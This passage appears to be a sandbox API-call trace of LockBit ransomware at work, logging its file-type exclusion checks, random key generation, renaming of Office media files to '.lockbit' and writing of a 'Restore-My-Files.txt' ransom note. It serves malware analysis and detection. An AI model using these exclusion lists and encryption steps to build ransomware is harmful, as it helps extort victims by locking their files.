lpString2=".WMF") returned -1 [0200.948] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0200.948] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0200.948] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0200.948] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0200.949] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0200.949] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0200.949] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0200.949] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0200.949] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0200.949] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0200.949] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0200.949] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0200.949] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0200.949] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0200.949] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0200.949] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD18223_.WMF") returned 1 [0200.949] lstrcmpiW (lpString1="ntldr", lpString2="BD18223_.WMF") returned 1 [0200.949] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD18223_.WMF") returned 1 [0200.949] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD18223_.WMF") returned 1 [0200.949] lstrcmpiW (lpString1="autorun.inf", lpString2="BD18223_.WMF") returned -1 [0200.949] lstrcmpiW (lpString1="thumbs.db", lpString2="BD18223_.WMF") returned 1 [0200.949] lstrcmpiW (lpString1="iconcache.db", lpString2="BD18223_.WMF") returned 1 [0200.949] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\") returned="" [0200.949] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18223_.WMF") returned=".WMF" [0200.949] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0200.949] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0200.949] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0200.949] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0200.949] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0200.949] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0200.949] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0200.950] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0200.950] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0200.950] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0200.950] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0200.950] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0200.950] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0200.950] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0200.950] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0200.950] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0200.950] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0200.950] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0200.950] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0200.950] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0200.950] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0200.950] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0200.950] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0200.950] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0200.950] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0200.951] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0200.951] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0200.951] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0200.951] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18223_.WMF.lockbit") returned 79 [0200.951] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18223_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18223_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0200.952] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0200.952] malloc (_Size=0x40068) returned 0x3df0008 [0200.952] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3162) returned 1 [0200.952] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.953] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.953] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0200.953] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.953] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.953] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0200.953] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0200.956] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18223_.WMF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18223_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0200.956] malloc (_Size=0xb4) returned 0x1fa2ed8 [0200.956] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb4, FileInformationClass=0xa) returned 0x0 [0200.958] free (_Block=0x1fa2ed8) [0200.958] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18223_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP") returned 1 [0200.958] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt") returned 79 [0200.958] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0200.958] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9730600, ftCreationTime.dwHighDateTime=0x1bdcf21, ftLastAccessTime.dwLowDateTime=0xbcc4be80, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa9730600, ftLastWriteTime.dwHighDateTime=0x1bdcf21, nFileSizeHigh=0x0, nFileSizeLow=0x680, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD18224_.WMF", cAlternateFileName="")) returned 1 [0200.958] lstrcmpiW (lpString1=".", lpString2="BD18224_.WMF") returned -1 [0200.958] lstrcmpiW (lpString1="..", lpString2="BD18224_.WMF") returned -1 [0200.958] PathFindExtensionW (pszPath="BD18224_.WMF") returned=".WMF" [0200.958] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0200.958] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0200.958] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0200.958] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0200.958] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0200.959] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0200.959] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0200.959] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0200.959] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0200.959] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0200.959] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0200.959] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0200.959] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0200.959] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0200.959] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0200.959] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0200.959] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0200.959] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0200.959] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0200.959] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0200.959] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0200.959] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0200.959] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0200.959] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0200.959] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0200.959] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0200.959] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0200.959] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0200.959] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0200.959] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0200.959] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0200.959] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0200.960] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0200.960] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0200.960] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0200.960] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0200.960] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0200.960] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0200.960] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0200.960] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0200.960] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0200.960] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0200.960] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0200.960] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0200.960] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0200.960] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0200.960] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0200.960] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD18224_.WMF") returned 1 [0200.960] lstrcmpiW (lpString1="ntldr", lpString2="BD18224_.WMF") returned 1 [0200.960] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD18224_.WMF") returned 1 [0200.960] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD18224_.WMF") returned 1 [0200.960] lstrcmpiW (lpString1="autorun.inf", lpString2="BD18224_.WMF") returned -1 [0200.960] lstrcmpiW (lpString1="thumbs.db", lpString2="BD18224_.WMF") returned 1 [0200.960] lstrcmpiW (lpString1="iconcache.db", lpString2="BD18224_.WMF") returned 1 [0200.960] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\") returned="" [0200.960] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18224_.WMF") returned=".WMF" [0200.960] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0200.960] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0200.960] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0200.960] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0200.960] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0200.961] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0200.961] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0200.961] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0200.961] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0200.961] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0200.961] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0200.961] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0200.961] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0200.961] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0200.961] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0200.961] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0200.961] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0200.961] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0200.961] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0200.961] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0200.961] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0200.961] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0200.961] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0200.961] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0200.961] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0200.961] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0200.961] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0200.961] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0200.961] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18224_.WMF.lockbit") returned 79 [0200.961] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18224_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18224_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0200.963] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0200.963] malloc (_Size=0x40068) returned 0x3d70450 [0200.963] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=1664) returned 1 [0200.963] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.963] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.964] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0200.964] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.964] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.964] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0200.964] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0200.966] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18224_.WMF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18224_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0200.966] malloc (_Size=0xb4) returned 0x1fa2ed8 [0200.966] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb4, FileInformationClass=0xa) returned 0x0 [0200.967] free (_Block=0x1fa2ed8) [0200.967] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18224_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP") returned 1 [0200.967] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt") returned 79 [0200.967] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0200.967] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2357bf00, ftCreationTime.dwHighDateTime=0x1bdcf23, ftLastAccessTime.dwLowDateTime=0xbcc4be80, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x2357bf00, ftLastWriteTime.dwHighDateTime=0x1bdcf23, nFileSizeHigh=0x0, nFileSizeLow=0xd10, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD18225_.WMF", cAlternateFileName="")) returned 1 [0200.967] lstrcmpiW (lpString1=".", lpString2="BD18225_.WMF") returned -1 [0200.967] lstrcmpiW (lpString1="..", lpString2="BD18225_.WMF") returned -1 [0200.967] PathFindExtensionW (pszPath="BD18225_.WMF") returned=".WMF" [0200.967] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0200.968] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0200.968] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0200.968] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0200.968] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0200.968] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0200.968] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0200.968] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0200.968] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0200.968] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0200.968] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0200.968] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0200.968] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0200.968] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0200.968] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0200.968] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0200.968] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0200.968] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0200.968] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0200.968] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0200.968] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0200.968] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0200.968] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0200.968] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0200.968] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0200.968] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0200.968] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0200.969] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0200.969] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0200.969] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0200.969] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0200.969] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0200.969] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0200.969] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0200.969] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0200.969] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0200.969] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0200.969] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0200.969] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0200.969] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0200.969] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0200.969] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0200.969] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0200.969] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0200.969] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0200.969] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0200.969] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0200.969] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD18225_.WMF") returned 1 [0200.969] lstrcmpiW (lpString1="ntldr", lpString2="BD18225_.WMF") returned 1 [0200.969] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD18225_.WMF") returned 1 [0200.969] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD18225_.WMF") returned 1 [0200.969] lstrcmpiW (lpString1="autorun.inf", lpString2="BD18225_.WMF") returned -1 [0200.969] lstrcmpiW (lpString1="thumbs.db", lpString2="BD18225_.WMF") returned 1 [0200.969] lstrcmpiW (lpString1="iconcache.db", lpString2="BD18225_.WMF") returned 1 [0200.969] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\") returned="" [0200.970] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18225_.WMF") returned=".WMF" [0200.970] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0200.970] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0200.970] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0200.970] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0200.970] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0200.970] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0200.970] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0200.970] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0200.970] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0200.970] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0200.970] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0200.970] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0200.970] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0200.970] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0200.970] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0200.970] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0200.970] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0200.970] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0200.970] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0200.970] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0200.970] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0200.970] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0200.970] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0200.970] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0200.970] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0200.971] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0200.971] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0200.971] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0200.971] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18225_.WMF.lockbit") returned 79 [0200.971] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18225_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18225_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0200.977] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0200.977] malloc (_Size=0x40068) returned 0x3f70048 [0200.977] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=3344) returned 1 [0200.977] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.978] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.978] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0200.978] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.978] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.978] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0200.978] ReadFile (in: hFile=0x3cc, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0200.981] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft 